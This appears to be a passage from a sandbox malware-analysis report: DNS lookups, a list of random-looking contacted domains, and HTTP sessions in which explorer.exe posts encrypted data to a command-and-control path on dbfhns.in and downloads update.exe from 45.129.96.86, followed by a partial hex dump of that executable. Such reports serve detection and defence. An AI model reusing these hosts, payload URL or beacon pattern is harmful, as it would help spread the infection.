                                                                      May 26, 2024 10:30:57.516274929 CEST1.1.1.1192.168.2.40xff21No error (0)dbfhns.in109.175.29.39A (IP address)IN (0x0001)false
                                                                      May 26, 2024 10:30:57.516274929 CEST1.1.1.1192.168.2.40xff21No error (0)dbfhns.in190.187.52.42A (IP address)IN (0x0001)false
                                                                      May 26, 2024 10:30:57.516274929 CEST1.1.1.1192.168.2.40xff21No error (0)dbfhns.in211.119.84.111A (IP address)IN (0x0001)false
                                                                      May 26, 2024 10:30:57.516274929 CEST1.1.1.1192.168.2.40xff21No error (0)dbfhns.in2.185.214.11A (IP address)IN (0x0001)false
                                                                      May 26, 2024 10:30:57.516274929 CEST1.1.1.1192.168.2.40xff21No error (0)dbfhns.in201.191.99.134A (IP address)IN (0x0001)false
                                                                      May 26, 2024 10:30:57.516305923 CEST1.1.1.1192.168.2.40xff21No error (0)dbfhns.in31.176.197.47A (IP address)IN (0x0001)false
                                                                      May 26, 2024 10:30:57.516305923 CEST1.1.1.1192.168.2.40xff21No error (0)dbfhns.in92.36.226.66A (IP address)IN (0x0001)false
                                                                      May 26, 2024 10:30:57.516305923 CEST1.1.1.1192.168.2.40xff21No error (0)dbfhns.in220.82.134.210A (IP address)IN (0x0001)false
                                                                      May 26, 2024 10:30:57.516305923 CEST1.1.1.1192.168.2.40xff21No error (0)dbfhns.in181.47.131.246A (IP address)IN (0x0001)false
                                                                      May 26, 2024 10:30:57.516305923 CEST1.1.1.1192.168.2.40xff21No error (0)dbfhns.in189.61.54.32A (IP address)IN (0x0001)false
                                                                      May 26, 2024 10:30:57.516305923 CEST1.1.1.1192.168.2.40xff21No error (0)dbfhns.in109.175.29.39A (IP address)IN (0x0001)false
                                                                      May 26, 2024 10:30:57.516305923 CEST1.1.1.1192.168.2.40xff21No error (0)dbfhns.in190.187.52.42A (IP address)IN (0x0001)false
                                                                      May 26, 2024 10:30:57.516305923 CEST1.1.1.1192.168.2.40xff21No error (0)dbfhns.in211.119.84.111A (IP address)IN (0x0001)false
                                                                      May 26, 2024 10:30:57.516305923 CEST1.1.1.1192.168.2.40xff21No error (0)dbfhns.in2.185.214.11A (IP address)IN (0x0001)false
                                                                      May 26, 2024 10:30:57.516305923 CEST1.1.1.1192.168.2.40xff21No error (0)dbfhns.in201.191.99.134A (IP address)IN (0x0001)false

                                                                      HTTP Request Dependency Graph

                                                                      • whispedwoodmoodsksl.shop
                                                                      • steamcommunity.com
                                                                      • 65.109.242.59
                                                                      • eobtgpmoikwju.org
                                                                        • dbfhns.in
                                                                      • tvjfpiseolhi.org
                                                                      • rmdbblxwbhidssfx.net
                                                                      • crrdnspsojxi.org
                                                                      • jfmevrxlmgrgcter.org
                                                                      • dcrgrikamcipdku.com
                                                                      • 45.129.96.86
                                                                      • jyuvkhsnugkdc.net
                                                                      • yukvxpqjtjfrjqw.net
                                                                      • lvfcajibsxtsk.com
                                                                      • dxmeirvuxixgqp.org
                                                                      • 23.145.40.124
                                                                      • 185.235.137.54
                                                                      • ycpgoadxufkj.net
                                                                      • blkpeagecciexc.com
                                                                      • 91.202.233.231
                                                                      • bffxawywalbkr.org
                                                                      • uvunmrjdxhvinab.org
                                                                      • unjbbvgiwfeg.com
                                                                      • krexlrcywwqsrfo.org
                                                                      • mlqkylljcnp.net
                                                                      • caefrlsewqoaju.org
                                                                      • bjcivuphfkkr.net
                                                                      • sdscberxlhps.org
                                                                      • gkjoqsoewca.org
                                                                      • hhlofuoqneckx.net
                                                                      • nygflvrwjiwigd.net
                                                                      • iuqvispkjnrqwr.net
                                                                      • lnnxnofesovuip.net
                                                                      • orsrbhepjknkic.org
                                                                      • vmhgovbhvgan.net
                                                                      • geojjabhsye.net
                                                                      • mmoytfgyxyxpsi.net
                                                                      • njscijpdcohnar.com
                                                                      • tssxxpdwgkaqunjd.org
                                                                      • hnsdtfxaaeohqfta.com
                                                                      • ioilnxgrkungvgve.com

                                                                      HTTP Packets

                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      0192.168.2.449736185.18.245.58802580C:\Windows\explorer.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      May 26, 2024 10:28:21.316977978 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Accept: */*
                                                                      Referer: http://eobtgpmoikwju.org/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                      Content-Length: 243
                                                                      Host: dbfhns.in
                                                                      May 26, 2024 10:28:21.317008018 CEST243OUTData Raw: 3b 6e 21 15 f5 bc 1c 2e a9 d8 b7 0a 04 08 7c bf 0a 0f cf e7 19 06 e5 6a 0a 79 0f e5 41 c4 b3 6d 92 2d b5 58 72 19 24 1b e7 9b 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 31 32 e7 ff
                                                                      Data Ascii: ;n!.|jyAm-Xr$? 9Yt M@NA .[k,vu12ZQ]p?JZy/VX5bnX#;);*/UT>ym7'V(;ghV<Bo0U{<wmMehb3C
                                                                      May 26, 2024 10:28:22.256031990 CEST152INHTTP/1.1 404 Not Found
                                                                      Server: nginx/1.26.0
                                                                      Date: Sun, 26 May 2024 08:28:22 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Connection: close
                                                                      Data Raw: 04 00 00 00 72 e8 85 ec
                                                                      Data Ascii: r


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      1192.168.2.449737185.18.245.58802580C:\Windows\explorer.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      May 26, 2024 10:28:22.363903046 CEST279OUTPOST /tmp/index.php HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Accept: */*
                                                                      Referer: http://tvjfpiseolhi.org/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                      Content-Length: 223
                                                                      Host: dbfhns.in
                                                                      May 26, 2024 10:28:22.363903046 CEST223OUTData Raw: 3b 6e 21 15 f5 bc 1c 2e a9 d8 b7 0a 04 08 7c bf 0a 0f cf e7 19 06 e5 6a 0a 79 0f e5 41 c4 b3 6d 92 2d b5 58 72 19 24 1b e7 9b 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0a 6b 2c 90 f5 76 0b 75 66 2e bf f3
                                                                      Data Ascii: ;n!.|jyAm-Xr$? 9Yt M@NA -[k,vuf.s1fc2_`9^c swS/1A?m[M;i3M eHT tGLiv8s!!&'q\
                                                                      May 26, 2024 10:28:23.287592888 CEST484INHTTP/1.1 404 Not Found
                                                                      Server: nginx/1.26.0
                                                                      Date: Sun, 26 May 2024 08:28:23 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Connection: close
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      2192.168.2.449738185.18.245.58802580C:\Windows\explorer.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      May 26, 2024 10:28:23.404115915 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Accept: */*
                                                                      Referer: http://rmdbblxwbhidssfx.net/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                      Content-Length: 164
                                                                      Host: dbfhns.in
                                                                      May 26, 2024 10:28:23.404146910 CEST164OUTData Raw: 3b 6e 21 15 f5 bc 1c 2e a9 d8 b7 0a 04 08 7c bf 0a 0f cf e7 19 06 e5 6a 0a 79 0f e5 41 c4 b3 6d 92 2d b5 58 72 19 24 1b e7 9b 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0b 6b 2c 90 f5 76 0b 75 23 01 e5 86
                                                                      Data Ascii: ;n!.|jyAm-Xr$? 9Yt M@NA -[k,vu#x7cdjlMZ?+GL>E!YL'w:@<FE
                                                                      May 26, 2024 10:28:24.348054886 CEST484INHTTP/1.1 404 Not Found
                                                                      Server: nginx/1.26.0
                                                                      Date: Sun, 26 May 2024 08:28:24 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Connection: close
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      3192.168.2.449739185.18.245.58802580C:\Windows\explorer.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      May 26, 2024 10:28:24.455656052 CEST279OUTPOST /tmp/index.php HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Accept: */*
                                                                      Referer: http://crrdnspsojxi.org/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                      Content-Length: 183
                                                                      Host: dbfhns.in
                                                                      May 26, 2024 10:28:24.455692053 CEST183OUTData Raw: 3b 6e 21 15 f5 bc 1c 2e a9 d8 b7 0a 04 08 7c bf 0a 0f cf e7 19 06 e5 6a 0a 79 0f e5 41 c4 b3 6d 92 2d b5 58 72 19 24 1b e7 9b 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 08 6b 2c 90 f5 76 0b 75 30 44 c5 8b
                                                                      Data Ascii: ;n!.|jyAm-Xr$? 9Yt M@NA -[k,vu0DZN|2{O>?l:c%a(FWxLV,v4T}zq3_?Z,8
                                                                      May 26, 2024 10:28:25.426429987 CEST484INHTTP/1.1 404 Not Found
                                                                      Server: nginx/1.26.0
                                                                      Date: Sun, 26 May 2024 08:28:25 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Connection: close
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      4192.168.2.449740185.18.245.58802580C:\Windows\explorer.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      May 26, 2024 10:28:25.535669088 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Accept: */*
                                                                      Referer: http://jfmevrxlmgrgcter.org/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                      Content-Length: 112
                                                                      Host: dbfhns.in
                                                                      May 26, 2024 10:28:25.535687923 CEST112OUTData Raw: 3b 6e 21 15 f5 bc 1c 2e a9 d8 b7 0a 04 08 7c bf 0a 0f cf e7 19 06 e5 6a 0a 79 0f e5 41 c4 b3 6d 92 2d b5 58 72 19 24 1b e7 9b 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 09 6b 2c 90 f5 76 0b 75 59 45 cb 9e
                                                                      Data Ascii: ;n!.|jyAm-Xr$? 9Yt M@NA -[k,vuYEJjznhLtU{%X
                                                                      May 26, 2024 10:28:26.457819939 CEST484INHTTP/1.1 404 Not Found
                                                                      Server: nginx/1.26.0
                                                                      Date: Sun, 26 May 2024 08:28:26 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Connection: close
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      5192.168.2.449741185.18.245.58802580C:\Windows\explorer.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      May 26, 2024 10:28:26.528095961 CEST282OUTPOST /tmp/index.php HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Accept: */*
                                                                      Referer: http://dcrgrikamcipdku.com/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                      Content-Length: 156
                                                                      Host: dbfhns.in
                                                                      May 26, 2024 10:28:26.528119087 CEST156OUTData Raw: 3b 6e 21 15 f5 bc 1c 2e a9 d8 b7 0a 04 08 7c bf 0a 0f cf e7 19 06 e5 6a 0a 79 0f e5 41 c4 b3 6d 92 2d b5 58 72 19 24 1b e7 9b 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0e 6b 2c 90 f5 76 0b 75 27 59 ea f5
                                                                      Data Ascii: ;n!.|jyAm-Xr$? 9Yt M@NA -[k,vu'YLXvvyLJ6ylW*)dERK/=V"0G
                                                                      May 26, 2024 10:28:27.457159996 CEST191INHTTP/1.1 404 Not Found
                                                                      Server: nginx/1.26.0
                                                                      Date: Sun, 26 May 2024 08:28:27 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Connection: close
                                                                      Data Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 d0 9e 5c 2d 5e 24 17 a6 61 44 a2 ae 09 ab c8 ad ac 2b 98 2b 9a ed 33 5e 14 98 8f c1 cb 7c d1
                                                                      Data Ascii: #\-^$aD++3^|


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      6192.168.2.44974245.129.96.86802580C:\Windows\explorer.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      May 26, 2024 10:28:27.567940950 CEST165OUTGET /file/update.exe HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                      Host: 45.129.96.86
                                                                      May 26, 2024 10:28:28.242614985 CEST1236INHTTP/1.1 200 OK
                                                                      Server: nginx/1.22.1
                                                                      Date: Sun, 26 May 2024 08:28:28 GMT
                                                                      Content-Type: application/octet-stream
                                                                      Content-Length: 325120
                                                                      Last-Modified: Sun, 26 May 2024 08:20:02 GMT
                                                                      Connection: keep-alive
                                                                      ETag: "6652f0b2-4f600"
                                                                      Accept-Ranges: bytes
                                                                      Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 5b 37 b0 84 3a 59 e3 84 3a 59 e3 84 3a 59 e3 89 68 86 e3 98 3a 59 e3 89 68 b9 e3 09 3a 59 e3 89 68 b8 e3 aa 3a 59 e3 8d 42 ca e3 8d 3a 59 e3 84 3a 58 e3 e7 3a 59 e3 31 a4 bc e3 85 3a 59 e3 89 68 82 e3 85 3a 59 e3 31 a4 87 e3 85 3a 59 e3 52 69 63 68 84 3a 59 e3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 0e 81 f9 63 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0c 00 00 0c 01 00 00 74 08 00 00 00 00 00 86 3d 00 00 00 10 00 00 00 20 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 90 09 00 00 04 00 00 70 bc 05 00 02 00 00 81 00 00 [TRUNCATED]
                                                                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$[7:Y:Y:Yh:Yh:Yh:YB:Y:X:Y1:Yh:Y1:YRich:YPELct= @pdHx@ d.text3 `.rdatal n@@.dataF~@.rsrcL@@
                                                                      May 26, 2024 10:28:28.244700909 CEST224INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b9 24 c5 48 00 e8 27 02 00 00 68 29 1b 41 00 e8 0f 24 00 00 59 c3 b9 2c c5 48 00 e8 7a 02 00 00 68 1f 1b 41
                                                                      Data Ascii: $H'h)A$Y,HzhA#YHhA#Yj HjHj(HjHUQQQQ$]EYY]UQQQQ$$]
                                                                      May 26, 2024 10:28:28.249526978 CEST1236INData Raw: f8 f2 0f 10 45 f8 59 59 8b e5 5d c3 55 8b ec 8b 45 0c 5d c3 55 8b ec 8b 45 08 80 38 00 75 04 33 c0 5d c3 50 e8 95 20 00 00 59 5d c3 55 8b ec 83 7d 10 00 75 05 8b 45 08 5d c3 5d e9 fe 11 00 00 55 8b ec 83 7d 10 00 75 05 8b 45 08 5d c3 5d e9 ba 18
                                                                      Data Ascii: EYY]UE]UE8u3]P Y]U}uE]]U}uE]]UEE]UE]d/Ad/AU3;M]UVEtV$Y^]AUEEA]AUWMPt
                                                                      May 26, 2024 10:28:28.254565954 CEST1236INData Raw: 48 00 ff 15 64 20 41 00 8d 4d f0 a3 94 bf 48 00 51 6a 40 ff 35 08 c5 48 00 50 ff 15 48 20 41 00 be 2e 00 4b 01 53 53 ff 15 50 21 41 00 53 ff d7 ff 15 08 20 41 00 4e 75 ec 8b 15 08 c5 48 00 8b f3 8b 1d 2c 20 41 00 85 d2 74 76 a1 0c c5 48 00 8a 8c
                                                                      Data Ascii: Hd AMHQj@5HPH A.KSSP!AS ANuH, AtvH0KH0uUj< Ajh<wA AhdwAjPEPEPEPjPhwAT AjjL AHF;r32=u>hwAj A3EQPQQQ AjjhwA
                                                                      May 26, 2024 10:28:28.254600048 CEST1236INData Raw: 2c 85 45 ad 41 81 6c 24 3c 65 41 f9 43 b8 9f 6a 30 32 f7 64 24 28 8b 44 24 28 b8 b0 f0 92 12 f7 64 24 54 8b 44 24 54 b8 6f 6a 11 1a f7 64 24 24 8b 44 24 24 81 44 24 34 19 dc 04 71 81 44 24 4c f6 83 45 2d b8 53 6c a7 66 f7 64 24 34 8b 44 24 34 81
                                                                      Data Ascii: ,EAl$<eACj02d$(D$(d$TD$Tojd$$D$$D$4qD$LE-Slfd$4D$4l$DDoxl$(_9Rl$,w4l$HTel$@{l$<P-36}WWWWW AWWW@ A[aFp|=Hu2WWWWWWD$XHD$X\WYW
                                                                      May 26, 2024 10:28:28.254632950 CEST1236INData Raw: 9a fb 00 00 83 ec 14 53 56 8b 75 08 57 8b f9 89 65 f0 89 7d e4 83 ce 0f e8 b8 ff ff ff 8b d8 3b de 73 05 8b 75 08 eb 27 33 d2 c7 45 e8 03 00 00 00 8b c6 8b 4f 14 f7 75 e8 d1 e9 3b c8 76 10 8b 57 14 8b c3 2b c1 8d 34 11 3b d0 76 02 8b f3 83 65 fc
                                                                      Data Ascii: SVuWe};su'3EOu;vW+4;veFPEPM]8EME@ePEEPTE@M}u]}vuPSjjEPWEPluw
                                                                      May 26, 2024 10:28:28.264111996 CEST1236INData Raw: 0f 6f 4e f8 8d 76 f8 8d 49 00 66 0f 6f 5e 10 83 e9 30 66 0f 6f 46 20 66 0f 6f 6e 30 8d 76 30 83 f9 30 66 0f 6f d3 66 0f 3a 0f d9 08 66 0f 7f 1f 66 0f 6f e0 66 0f 3a 0f c2 08 66 0f 7f 47 10 66 0f 6f cd 66 0f 3a 0f ec 08 66 0f 7f 6f 20 8d 7f 30 7d
                                                                      Data Ascii: oNvIfo^0foF fon0v00fof:ffof:fGfof:fo 0}vVfoNvfo^0foF fon0v00fof:ffof:fGfof:fo 0}v|ovfsvs~vf
                                                                      May 26, 2024 10:28:28.266961098 CEST1236INData Raw: 04 49 75 f3 8b c8 83 e1 03 74 0f 8a 06 88 07 46 47 49 75 f7 8d 9b 00 00 00 00 58 5e 5f c3 8d a4 24 00 00 00 00 eb 03 cc cc cc ba 10 00 00 00 2b d0 2b ca 51 8b c2 8b c8 83 e1 03 74 09 8a 16 88 17 46 47 49 75 f7 c1 e8 02 74 0d 8b 16 89 17 8d 76 04
                                                                      Data Ascii: IutFGIuX^_$++QtFGIutvHuYUUAM##MA]tjYAt!jLtjY)jh@jj0UEu3]@]WVt$L$
                                                                      May 26, 2024 10:28:28.266994953 CEST1236INData Raw: 03 23 d1 88 47 03 83 ee 01 c1 e9 02 83 ef 01 83 f9 08 72 b2 fd f3 a5 fc ff 24 95 94 2e 40 00 8d 49 00 8a 46 03 23 d1 88 47 03 8a 46 02 c1 e9 02 88 47 02 83 ee 02 83 ef 02 83 f9 08 72 88 fd f3 a5 fc ff 24 95 94 2e 40 00 90 8a 46 03 23 d1 88 47 03
                                                                      Data Ascii: #Gr$.@IF#GFGr$.@F#GFGFGV$.@IH.@P.@X.@`.@h.@p.@x.@.@DDDDDDDDDDDDDD$.@.@.@
                                                                      May 26, 2024 10:28:28.272622108 CEST1236INData Raw: 00 74 1d 8a 11 83 c1 01 84 d2 74 66 88 17 83 c7 01 f7 c1 03 00 00 00 75 ea eb 05 89 17 83 c7 04 ba ff fe fe 7e 8b 01 03 d0 83 f0 ff 33 c2 8b 11 83 c1 04 a9 00 01 01 81 74 e1 84 d2 74 34 84 f6 74 27 f7 c2 00 00 ff 00 74 12 f7 c2 00 00 00 ff 74 02
                                                                      Data Ascii: ttfu~3tt4t'ttD$_fD$G_fD$_D$_Vjj YYVx AHHujX^&3^jh~Ae-eu#YuEuUQSV
                                                                      May 26, 2024 10:28:28.272655964 CEST1236INData Raw: 00 c7 00 16 00 00 00 e8 6c 11 00 00 83 c8 ff eb 3c 8b 7d 10 85 ff 74 0a 83 ff 01 74 05 83 ff 02 75 da 56 e8 2b 1b 00 00 59 83 65 fc 00 57 ff 75 0c 56 e8 18 ff ff ff 83 c4 0c 8b f8 89 7d e4 c7 45 fc fe ff ff ff e8 0e 00 00 00 8b c7 e8 81 17 00 00
